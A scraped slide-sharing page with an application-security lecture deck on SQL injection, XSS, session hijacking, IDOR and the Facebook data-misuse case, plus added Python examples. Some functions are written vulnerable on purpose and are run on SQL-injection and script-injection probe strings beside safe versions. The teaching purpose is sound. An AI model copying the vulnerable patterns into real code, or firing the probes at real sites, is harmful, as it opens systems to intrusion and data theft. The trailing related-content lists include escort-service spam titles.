Application security
We will cover:
• Some basic definitions
• Application Security meaning
• CIA
• Vulnerabilities
• Demo attack
• Countermeasures
• Best practice to build a secure app.
• Facebook on Spot
Basic definitions
Asset: a resource of value that needs to be protected.
Threat: an undesired event that may compromise an asset or object, or produce an undesired outcome.
Vulnerability: a weakness in your system, or in a security control, that an exploit can take advantage of to cause harm.
Attack: an action that uses one or more vulnerabilities to realize a threat.
Security Control: a process or policy put together to reduce security threats to an acceptable level.
Application Security: the use of software, hardware, and procedural methods to protect applications from external threats.
Attacks Shift Towards Application Layer (chart; labels recoverable from the slide: "% of Dollars", "75%", "attacks")
Application Security aims to secure:
Confidentiality
Malware can be written to run directed searches and send confidential data to specific parties.
Integrity
Viruses attach themselves to the system and stay resident in it, which allows an attacker to completely control the system; they may erase data files or tamper with application data over time in such a way that data integrity is compromised and the data becomes completely useless.
Availability
Malware can compromise programs and data to the point where they are no longer available; sometimes this is a direct denial of service (DoS) attack, and sometimes it is a side effect of the malware's activity.
Application Vulnerability
A software "vulnerability" is a flaw that lets critical data be processed in an insecure way. By exploiting these "holes" in applications, cybercriminals can gain entry into an organization's systems and steal confidential data.
Common software vulnerabilities:
• SQL injection
• Cross-Site Scripting (XSS)
Almost every application has vulnerabilities: about 70% of all applications had at least one vulnerability classified as one of the top 10 web vulnerability types. Commercial software, financial services software, software written by government agencies … all are vulnerable.
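As an added example (not from the slides), the two vulnerability classes named above, each in its vulnerable form beside the hardened form: string-built SQL versus a parameterised query against a constructed in-memory SQLite table, and verbatim versus HTML-escaped output. The table rows and the probe strings are constructed for the demo.

```python
import html
import sqlite3

# Constructed sample data for the demo (not from the original slides).
_conn = sqlite3.connect(":memory:", check_same_thread=False)
_conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
_conn.executemany(
    "INSERT INTO users VALUES (?, ?)",
    [("alice", "alice@example.com"), ("bob", "bob@example.com")],
)
_conn.commit()


def find_user_vulnerable(name: str) -> list:
    """SQL injection: the user-supplied value is pasted into the query text,
    so a quote character in `name` changes the structure of the query."""
    query = f"SELECT name, email FROM users WHERE name = '{name}'"
    return _conn.execute(query).fetchall()


def find_user_safe(name: str) -> list:
    """Parameterised query: the driver sends `name` as data, never as SQL,
    so the same probe string simply matches no user."""
    return _conn.execute(
        "SELECT name, email FROM users WHERE name = ?", (name,)
    ).fetchall()


def render_greeting_vulnerable(display_name: str) -> str:
    """Reflected XSS: untrusted text is inserted into HTML verbatim, so a
    <script> element in it is executed by the victim's browser."""
    return f"<p>Welcome, {display_name}</p>"


def render_greeting_safe(display_name: str) -> str:
    """Output encoding turns markup characters into harmless entities;
    the browser shows the text instead of interpreting it."""
    return f"<p>Welcome, {html.escape(display_name, quote=True)}</p>"


if __name__ == "__main__":
    probe = "x' OR '1'='1"                 # textbook tautology probe
    print(find_user_vulnerable(probe))     # every row leaks
    print(find_user_safe(probe))           # [] : no such user
    tag = "<script>alert(1)</script>"
    print(render_greeting_vulnerable(tag))
    print(render_greeting_safe(tag))
```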
Application Vulnerability - Demo Attack
Phases of hacker attacks
1-Information
• Fingerprinting
• Vulnerability DB
• Bulletin Boards
• …….
2-Infrastructure
• Phishing
• Pharming
• XSS
• …..
3-Exploit
• …..
4-Keep Access
• Backdoor
• Trojan
• Rootkits
• …..
5-Delete Fingerprints
• Destroy evidence
• Steganography
• Tunneling
Phase 1 (Information)
SQL Injection
1. Hacker searches for information about the victim's target system
Operating System
Web Server
Database
2. Compares the information with a vulnerability database
3. Hacker finds a vulnerability
Search for a (specific) user
Find additional information about the user
4. Needs this information for the next phase of the attack
Application Vulnerability - Demo Attack
Phase 2 (Infrastructure)
Cross Site Scripting (XSS)
1. Hacker has found personal information about the user
e-mail
Phone number
…
2. Sends an e-mail with an unsuspicious topic
3. Includes in the e-mail an XSS payload that sends the user's session to the hacker's server
4. User receives the e-mail
5. The e-mail looks unsuspicious to the user
Topic
Originator
6. The included XSS sends all cookies to the hacker's web site
Application Vulnerability - Demo Attack
Phase 3 - Exploit
Session hijacking
1. Hacker receives all cookies from the user
2. Cookies are used to identify users
3. Hacker uses the cookie to resume the user's session
4. Hacker is logged in as user "victim" with the user's access rights
o XSS-Proxy is a tool for leveraging Cross-Site-Scripting (XSS) flaws to hijack victim browsers; it provides a bi-directional interactive control channel between the attacker, the victim's browser and an XSS-vulnerable site.
Now the hacker is logged in to your banking site with your access rights.
That was just the beginning
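The defender's view of Phases 2 and 3, as an added example that is not part of the original deck: the session cookie is issued with HttpOnly (so a script injected via XSS cannot read it from document.cookie), Secure and SameSite=Strict, and every request is checked against the client context the session was issued to, so a cookie replayed from another browser is revoked and raised as an alert. The in-memory `SESSIONS` and `ALERTS` stores, the `login`/`resolve_session` functions and the sample user agents and addresses are all constructed for the demo.

```python
import logging
import secrets
from dataclasses import dataclass
from http.cookies import SimpleCookie

log = logging.getLogger("session")


@dataclass
class Session:
    user: str
    user_agent: str   # client context captured when the session was issued
    client_ip: str


# Hypothetical in-memory stores; a real app keeps these server-side.
SESSIONS: dict = {}
ALERTS: list = []     # what a SOC detection rule would be fed


def login(user: str, user_agent: str, client_ip: str) -> tuple:
    """Issue a session and return (session_id, Set-Cookie header value).

    HttpOnly keeps the cookie out of document.cookie, so a script injected
    through XSS cannot ship it off; Secure keeps it off plain HTTP;
    SameSite=Strict stops it riding along on cross-site requests."""
    sid = secrets.token_urlsafe(32)            # 256 bits, unguessable
    SESSIONS[sid] = Session(user, user_agent, client_ip)
    cookie = SimpleCookie()
    cookie["sid"] = sid
    cookie["sid"]["httponly"] = True
    cookie["sid"]["secure"] = True
    cookie["sid"]["samesite"] = "Strict"
    cookie["sid"]["path"] = "/"
    return sid, cookie["sid"].OutputString()


def resolve_session(cookie_header: str, user_agent: str, client_ip: str):
    """Return the user for the session named in the Cookie header, or None.

    A cookie presented from a different browser than it was issued to is
    what a stolen session looks like: revoke it and raise an alert.  An IP
    change alone is only logged, because mobile and NAT clients legitimately
    change address; a real system would fold it into a risk score."""
    cookie = SimpleCookie()
    cookie.load(cookie_header)
    sid = cookie["sid"].value if "sid" in cookie else None
    session = SESSIONS.get(sid)
    if session is None:
        return None
    if session.user_agent != user_agent:
        msg = (f"possible session hijack: user={session.user} issued to "
               f"{session.client_ip} {session.user_agent!r}, replayed from "
               f"{client_ip} {user_agent!r}")
        log.warning(msg)
        ALERTS.append(msg)
        del SESSIONS[sid]          # revoke; the real user must log in again
        return None
    if session.client_ip != client_ip:
        log.info("session for %s moved from %s to %s",
                 session.user, session.client_ip, client_ip)
    return session.user


if __name__ == "__main__":
    sid, set_cookie = login("victim", "Mozilla/5.0 (X11)", "203.0.113.5")
    print("Set-Cookie:", set_cookie)
    print(resolve_session(f"sid={sid}", "Mozilla/5.0 (X11)", "203.0.113.5"))
    print(resolve_session(f"sid={sid}", "curl/8.0", "198.51.100.9"))
    print(ALERTS)
```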
Application Vulnerability - Demo Attack
Phase 4 – Keep Access
• Attacker can install a sniffer to capture all network traffic
• Use a backdoor or trojan to gain repeated access.
• May install rootkits in the kernel to get superuser access at the operating system level.
• They can then use their access to steal data, consume CPU cycles and exchange confidential information, or even resort to extortion.
• They can maintain control of the system for a long time by "hardening the system" against other attackers.
Application Vulnerability - Demo Attack
Phase 5 – Delete Fingerprints
• Trojaned system tools such as ps or netcat are used to destroy the evidence in the registry files, or the legitimate system binaries are replaced with them.
• Steganography is the process of hiding data, for example in images and sound files.
• Tunneling takes advantage of the transmission protocol by carrying one protocol over another. Even the extra space (unused bits) in the TCP and IP headers can be used to hide information.
Application Security Countermeasures
• Countermeasures are the actions taken to ensure application security
• Application Firewall is the most basic software countermeasure that
limits the execution of files or the handling of data by specific
installed programs.
• Router is the most common hardware countermeasure that can
prevent the IP address of an individual computer from being directly
visible on the Internet.
• Other countermeasures include conventional firewalls,
encryption/decryption programs, anti-virus programs, spyware
detection/removal programs and biometric authentication systems.
Best Practices to Build Secure Applications
1. Follow the OWASP Top Ten
It lists the most critical web application security vulnerabilities. These vulnerabilities target the confidentiality, integrity, and availability of an application, its developers, and its users, and cover such attack vectors as injection, broken authentication and session management, security misconfiguration, and sensitive data exposure.
2. Get an Application Security Audit
Have people with specific, professional application security experience review the application: they know what to look for, including the obvious, the subtle and the hidden. They will also be abreast of current security issues and know about issues that aren't common knowledge yet.
3. Implement Proper Logging
At some stage something goes wrong: a bug that no one saw (or that no one considered severe enough to warrant particular attention) will eventually be exploited. To be able to respond as quickly as possible, you need proper logging in place before the situation gets out of hand. It gives you information about what occurred, what led to the situation in the first place, and what else was going on at the time.
4. Use Real-time Security Monitoring and Protection or Web Application Firewalls
Protect your application from a range of perspectives, both internal and external, using firewalls in addition to Runtime Application Self-Protection (RASP) and monitoring services.
5. Encrypt Everything
Make sure that data at rest is encrypted as well as data in transit. HTTPS makes Man In The Middle (MITM) attacks next to impossible.
6. Harden Everything
Ensure that everything is sufficiently hardened, from operating systems to software development frameworks.
7. Keep Your Servers Up to Date
Make sure that your servers are set to update to the latest security releases as they become available.
8. Keep Your Software Up to Date
Application frameworks and third-party software libraries, just like operating systems, have vulnerabilities. If they're properly supported, they will also be rapidly patched and improved, so it's important to ensure that you're using the latest stable version.
9. Stay Abreast of the Latest Vulnerabilities
There are a range of ways to stay updated on the attack vectors in play today, such as cross-site scripting, code injection, SQL injection, insecure direct object references, and cross-site request forgery.
10. Never Stop Learning
That way, you'll always have security as a key consideration and be far less likely to fall victim to security or data breaches.
Best Practices to Build Secure Applications
Data privacy is a part of Information Security and Cyber Security, and any kind of hole, such as an IDOR (missing access control) or data leakage in the GraphQL wrapper implementation and Facebook APIs, is able to destroy an empire like Facebook.
Is this related to Information Security?!
During the USA elections, a quiz app developed by Kogan for USA residents aimed to collect users' data and their friends' data, and it did collect data for 50 million users.
What will the Facebook Information Security Team do?!
• Review our platform. We will investigate all apps that had access to large amounts of
information before we changed our platform in 2014 to reduce data access, and we will
conduct a full audit of any app with suspicious activity. If we find developers that misused
personally identifiable information, we will ban them from our platform.
• Tell people about data misuse. We will tell people affected by apps that have misused their
data. This includes building a way for people to know if their data might have been accessed
via “thisisyourdigitallife.” Moving forward, if we remove an app for misusing data, we will tell
everyone who used it.
• Turn off access for unused apps. If someone hasn’t used an app within the last three months,
we will turn off the app’s access to their information.
• Restrict Facebook Login data. We are changing Login, so that in the next version, we will
reduce the data that an app can request without app review to include only name, profile
photo and email address. Requesting any other data will require our approval.
• Encourage people to manage the apps they use. We already show people what apps their
accounts are connected to and control what data they’ve permitted those apps to use. Going
forward, we’re going to make these choices more prominent and easier to manage.
• Reward people who find vulnerabilities. In the coming weeks we will expand Facebook’s bug
bounty program so that people can also report to us if they find misuses of data by app
developers.
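An added example (not from the slides or from Facebook's code) of the two controls this case turns on: an object-level authorization check that closes the IDOR hole named above (an app acting for one user cannot read another user's record, so it cannot walk the friend list), and a field-level scope check that serves only name, profile photo and email unless the app has been through review. The profile records, app ids and the `Caller` type are constructed for the demo.

```python
from dataclasses import dataclass

# Fields an app may read without app review (the set the Facebook bullet
# above names); anything beyond this needs an explicitly approved scope.
DEFAULT_FIELDS = frozenset({"name", "profile_photo", "email"})

# Constructed sample records, not real data.
PROFILES = {
    "u1": {"name": "Alice", "profile_photo": "alice.jpg",
           "email": "alice@example.com", "phone": "+1-555-0100",
           "friends": ["u2"]},
    "u2": {"name": "Bob", "profile_photo": "bob.jpg",
           "email": "bob@example.com", "phone": "+1-555-0101",
           "friends": ["u1"]},
}


@dataclass(frozen=True)
class Caller:
    user_id: str                 # the person who authorised the app
    app_id: str
    approved_fields: frozenset   # extra fields granted through app review


class AccessDenied(Exception):
    pass


def get_profile_idor(caller: Caller, target_id: str, fields: list) -> dict:
    """The missing-access-control shape: any target id and any field are
    served as long as the record exists, so an app authorised by u1 can
    follow u1's friend list and pull u2's phone number."""
    record = PROFILES[target_id]
    return {f: record[f] for f in fields}


def get_profile(caller: Caller, target_id: str, fields: list) -> dict:
    """Object-level check first (whose record is this?), then field-level
    check (is the app allowed to see these attributes?)."""
    if target_id != caller.user_id:
        raise AccessDenied(f"app {caller.app_id} may not read profile {target_id}")
    record = PROFILES.get(target_id)
    if record is None:
        raise AccessDenied(f"no such profile {target_id}")
    denied = set(fields) - (DEFAULT_FIELDS | caller.approved_fields)
    if denied:
        raise AccessDenied(f"fields {sorted(denied)} need app review")
    return {f: record[f] for f in fields}


def is_allowed(caller: Caller, target_id: str, fields: list) -> bool:
    """Policy check helper: True if get_profile would serve the read."""
    try:
        get_profile(caller, target_id, fields)
        return True
    except AccessDenied:
        return False


if __name__ == "__main__":
    quiz = Caller("u1", "quiz-app", frozenset())
    print(get_profile_idor(quiz, "u2", ["phone"]))      # leaks a friend's phone
    print(get_profile(quiz, "u1", ["name", "email"]))   # served
    print(is_allowed(quiz, "u1", ["friends"]))          # False: needs review
```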
Application security

Mais conteúdo relacionado

Mais procurados

NETWORK SECURITY
NETWORK SECURITYNETWORK SECURITY
NETWORK SECURITYafaque jaya
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?btpsec
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware AnalysisAndrew McNicol
 
Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Fabiha Shahzad
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainSuvrat Jain
 
Types of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsTypes of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsLearningwithRayYT
 
Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case studyAntonio Fontes
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing Netpluz Asia Pte Ltd
 
Introduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingIntroduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingRaghav Bisht
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)mmubashirkhan
 
Introduction to Cybersecurity
Introduction to CybersecurityIntroduction to Cybersecurity
Introduction to CybersecurityKrutarth Vasavada
 
Network Security
Network SecurityNetwork Security
Network Securityforpalmigho
 
Cyber security fundamentals
Cyber security fundamentalsCyber security fundamentals
Cyber security fundamentalsCloudflare
 
Firewall presentation
Firewall presentationFirewall presentation
Firewall presentationTayabaZahid
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
Social engineering presentation
Social engineering presentationSocial engineering presentation
Social engineering presentationpooja_doshi
 

Mais procurados (20)

Advanced persistent threats(APT)
Advanced persistent threats(APT)Advanced persistent threats(APT)
Advanced persistent threats(APT)
 
Cyber security
Cyber securityCyber security
Cyber security
 
NETWORK SECURITY
NETWORK SECURITYNETWORK SECURITY
NETWORK SECURITY
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
 
Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
 
Types of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsTypes of Threat Actors and Attack Vectors
Types of Threat Actors and Attack Vectors
 
Application Security
Application SecurityApplication Security
Application Security
 
Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case study
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Introduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingIntroduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration Testing
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)
 
Introduction to Cybersecurity
Introduction to CybersecurityIntroduction to Cybersecurity
Introduction to Cybersecurity
 
Network Security
Network SecurityNetwork Security
Network Security
 
Cyber security fundamentals
Cyber security fundamentalsCyber security fundamentals
Cyber security fundamentals
 
Firewall presentation
Firewall presentationFirewall presentation
Firewall presentation
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
 
Social engineering presentation
Social engineering presentationSocial engineering presentation
Social engineering presentation
 

Semelhante a Application security

Security Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdfSecurity Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdfAmeliaJonas2
 
Security in Computing and IT
Security in Computing and ITSecurity in Computing and IT
Security in Computing and ITKomalah Nair
 
Best Practices, Types, and Tools for Security Testing in 2023.docx
Best Practices, Types, and Tools for Security Testing in 2023.docxBest Practices, Types, and Tools for Security Testing in 2023.docx
Best Practices, Types, and Tools for Security Testing in 2023.docxAfour tech
 
Top 20 certified ethical hacker interview questions and answer
Top 20 certified ethical hacker interview questions and answerTop 20 certified ethical hacker interview questions and answer
Top 20 certified ethical hacker interview questions and answerShivamSharma909
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochQA or the Highway
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochQA or the Highway
 
Application security testing an integrated approach
Application security testing   an integrated approachApplication security testing   an integrated approach
Application security testing an integrated approachIdexcel Technologies
 
Deep Learning based Threat / Intrusion detection system
Deep Learning based Threat / Intrusion detection systemDeep Learning based Threat / Intrusion detection system
Deep Learning based Threat / Intrusion detection systemAffine Analytics
 
23 network security threats pkg
23 network security threats pkg23 network security threats pkg
23 network security threats pkgUmang Gupta
 
Student NameCYB110Playbook Runbook Parts 1-3S.docx
Student NameCYB110Playbook  Runbook Parts 1-3S.docxStudent NameCYB110Playbook  Runbook Parts 1-3S.docx
Student NameCYB110Playbook Runbook Parts 1-3S.docxdeanmtaylor1545
 
Introduction to Pre-Cybersecurity.pptx
Introduction to Pre-Cybersecurity.pptxIntroduction to Pre-Cybersecurity.pptx
Introduction to Pre-Cybersecurity.pptxyoufanlimboo
 
Chapter1 intro network_security_sunorganised
Chapter1 intro network_security_sunorganisedChapter1 intro network_security_sunorganised
Chapter1 intro network_security_sunorganisedBule Hora University
 
Information Technology Security Basics
Information Technology Security BasicsInformation Technology Security Basics
Information Technology Security BasicsMohan Jadhav
 
What is penetration testing and why is it important for a business to invest ...
What is penetration testing and why is it important for a business to invest ...What is penetration testing and why is it important for a business to invest ...
What is penetration testing and why is it important for a business to invest ...Alisha Henderson
 
Information security software security presentation.pptx
Information security software security presentation.pptxInformation security software security presentation.pptx
Information security software security presentation.pptxsalutiontechnology
 
Security Threats and Vulnerabilities-2.pptx
Security Threats and Vulnerabilities-2.pptxSecurity Threats and Vulnerabilities-2.pptx
Security Threats and Vulnerabilities-2.pptxAmardeepKumar621436
 
SegurançA Da InformaçãO Faat V1 4
SegurançA Da InformaçãO Faat V1 4SegurançA Da InformaçãO Faat V1 4
SegurançA Da InformaçãO Faat V1 4Rodrigo Piovesana
 
Advanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementAdvanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementMayur Nanotkar
 

Semelhante a Application security (20)

Security Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdfSecurity Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdf
 
Mobile Apps Security Testing -1
Mobile Apps Security Testing -1Mobile Apps Security Testing -1
Mobile Apps Security Testing -1
 
Security in Computing and IT
Security in Computing and ITSecurity in Computing and IT
Security in Computing and IT
 
Best Practices, Types, and Tools for Security Testing in 2023.docx
Best Practices, Types, and Tools for Security Testing in 2023.docxBest Practices, Types, and Tools for Security Testing in 2023.docx
Best Practices, Types, and Tools for Security Testing in 2023.docx
 
Research Paper
Research PaperResearch Paper
Research Paper
 
Top 20 certified ethical hacker interview questions and answer
Top 20 certified ethical hacker interview questions and answerTop 20 certified ethical hacker interview questions and answer
Top 20 certified ethical hacker interview questions and answer
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan Koch
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan Koch
 
Application security testing an integrated approach
Application security testing   an integrated approachApplication security testing   an integrated approach
Application security testing an integrated approach
 
Deep Learning based Threat / Intrusion detection system
Deep Learning based Threat / Intrusion detection systemDeep Learning based Threat / Intrusion detection system
Deep Learning based Threat / Intrusion detection system
 
23 network security threats pkg
23 network security threats pkg23 network security threats pkg
23 network security threats pkg
 
Student NameCYB110Playbook Runbook Parts 1-3S.docx
Student NameCYB110Playbook  Runbook Parts 1-3S.docxStudent NameCYB110Playbook  Runbook Parts 1-3S.docx
Student NameCYB110Playbook Runbook Parts 1-3S.docx
 
Introduction to Pre-Cybersecurity.pptx
Introduction to Pre-Cybersecurity.pptxIntroduction to Pre-Cybersecurity.pptx
Introduction to Pre-Cybersecurity.pptx
 
Chapter1 intro network_security_sunorganised
Chapter1 intro network_security_sunorganisedChapter1 intro network_security_sunorganised
Chapter1 intro network_security_sunorganised
 
Information Technology Security Basics
Information Technology Security BasicsInformation Technology Security Basics
Information Technology Security Basics
 
What is penetration testing and why is it important for a business to invest ...
What is penetration testing and why is it important for a business to invest ...What is penetration testing and why is it important for a business to invest ...
What is penetration testing and why is it important for a business to invest ...
 
Information security software security presentation.pptx
Information security software security presentation.pptxInformation security software security presentation.pptx
Information security software security presentation.pptx
 
Security Threats and Vulnerabilities-2.pptx
Security Threats and Vulnerabilities-2.pptxSecurity Threats and Vulnerabilities-2.pptx
Security Threats and Vulnerabilities-2.pptx
 
SegurançA Da InformaçãO Faat V1 4
SegurançA Da InformaçãO Faat V1 4SegurançA Da InformaçãO Faat V1 4
SegurançA Da InformaçãO Faat V1 4
 
Advanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementAdvanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security Management
 

Último

(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escortsranjana rawat
 
APPLICATIONS-AC/DC DRIVES-OPERATING CHARACTERISTICS
APPLICATIONS-AC/DC DRIVES-OPERATING CHARACTERISTICSAPPLICATIONS-AC/DC DRIVES-OPERATING CHARACTERISTICS
APPLICATIONS-AC/DC DRIVES-OPERATING CHARACTERISTICSKurinjimalarL3
 
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...ranjana rawat
 
Introduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptxIntroduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptxupamatechverse
 
KubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlyKubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlysanyuktamishra911
 
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur EscortsHigh Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escortsranjana rawat
 
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...ranjana rawat
 
Coefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptxCoefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptxAsutosh Ranjan
 
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park  6297143586 Call Hot Ind...Booking open Available Pune Call Girls Koregaon Park  6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...Call Girls in Nagpur High Profile
 
HARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICS
HARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICSHARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICS
HARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICSRajkumarAkumalla
 
Microscopic Analysis of Ceramic Materials.pptx
Microscopic Analysis of Ceramic Materials.pptxMicroscopic Analysis of Ceramic Materials.pptx
Microscopic Analysis of Ceramic Materials.pptxpurnimasatapathy1234
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated  Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated  Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Call Girls in Nagpur High Profile
 
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130Suhani Kapoor
 
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...Dr.Costas Sachpazis
 
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINEMANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINESIVASHANKAR N
 
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...Dr.Costas Sachpazis
 
SPICE PARK APR2024 ( 6,793 SPICE Models )
SPICE PARK APR2024 ( 6,793 SPICE Models )SPICE PARK APR2024 ( 6,793 SPICE Models )
SPICE PARK APR2024 ( 6,793 SPICE Models )Tsuyoshi Horigome
 
Introduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptxIntroduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptxupamatechverse
 
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Serviceranjana rawat
 

Último (20)

(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
 
APPLICATIONS-AC/DC DRIVES-OPERATING CHARACTERISTICS
APPLICATIONS-AC/DC DRIVES-OPERATING CHARACTERISTICSAPPLICATIONS-AC/DC DRIVES-OPERATING CHARACTERISTICS
APPLICATIONS-AC/DC DRIVES-OPERATING CHARACTERISTICS
 
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
 
Introduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptxIntroduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptx
 
KubeKraft presentation @CloudNativeHooghly
